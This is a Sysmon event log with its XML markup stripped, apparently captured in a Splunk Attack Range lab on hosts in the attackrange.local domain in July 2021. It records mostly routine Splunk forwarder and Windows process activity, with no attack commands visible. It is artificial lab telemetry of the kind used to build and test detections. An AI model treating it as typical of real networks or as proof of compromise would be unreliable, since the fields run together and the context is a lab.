23542300x80000000000000001045397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92B6D298F73E418BEF3E3A91982F109,SHA256=D705921C3300218BDD7F980456D9A2AD9FD8D13233FBB458FCF1AD4745A08C2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:54.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB44EE5325C29C34120D2D17ED6363AD,SHA256=269EBA3AAB20842DD2D73251640165DC1DFA37F13F97EE2E449A416D73C34D11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.720{466BC892-F242-60EB-DB7C-00000000CF01}20085836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA64E7ADBDB8F3354493C958658BEBA6,SHA256=DD7F76C4C3C6866E153822BC59AD377684B1A6130987407FF4B3795F06906C7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.518{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001045386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.039{466BC892-F241-60EB-DA7C-00000000CF01}92247896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000805669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:53.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57125-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.872{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBD7DD6A01CD1B0EE31A888F5BD78562,SHA256=ED0C815DDA4E7604EDD95B85D90581BD24EB4C12BA713D1C9C1B44AE3DFB57B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:55.455{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604F0D235A07DC8094F0EF36FD39630D,SHA256=ACF5558ED4735EDFA68B8479C2F7DEBF14BC138865A57D035A27561DB376549A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:41:55.342{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.342{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.342{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.206{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.887{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5480AD9B2247E7E18D54D32AB920F9,SHA256=E9E624A0C974AF1198100CD7AA3140960D7E4F0D0C87FB2ACFA0A9D2E59314ED,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:56.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2DDB08813BC266A60F08E5A04F91EE,SHA256=1F78012ABD64DD6C664F8DCF7FFB8203296BD68237168F3DD87F05EBF7DF03AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.671{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:47.729{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50870-false10.0.1.12-8000- 23542300x80000000000000001045407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E94C19B74B372ACBC19E5A6312E9069,SHA256=7B9F1DA1315BC79A1B21C5E2F6BCF31F3484133290076D93FD2A45753ABD7B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:57.902{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FFD19191F72CAAF9A98CE17B0F3B8E2,SHA256=ED69F3222210E20BD41FF0706C78478472C91454C4508860E64459B339C87AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:57.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0564954F3C9C40032E6F52A31AED1277,SHA256=0F79EC94E3C29D0F93E6A675518A24630F2EEB3199612F8971C12CB599B9C319,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:58.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057F8118299D8AA0C88051F03F167BDC,SHA256=5F0948ABF79B2B0833DA52CD1884BF4ACE2B16326BD423F4A0111C0C1E7C4714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFAFCFEF821DB42DFEA289202B9B2D32,SHA256=C5EE8A0BA5950F4030C93E329B4CC7BBAC8A672232BF1AE0D07D4D58FBCC0381,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001045414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.586{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.586{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
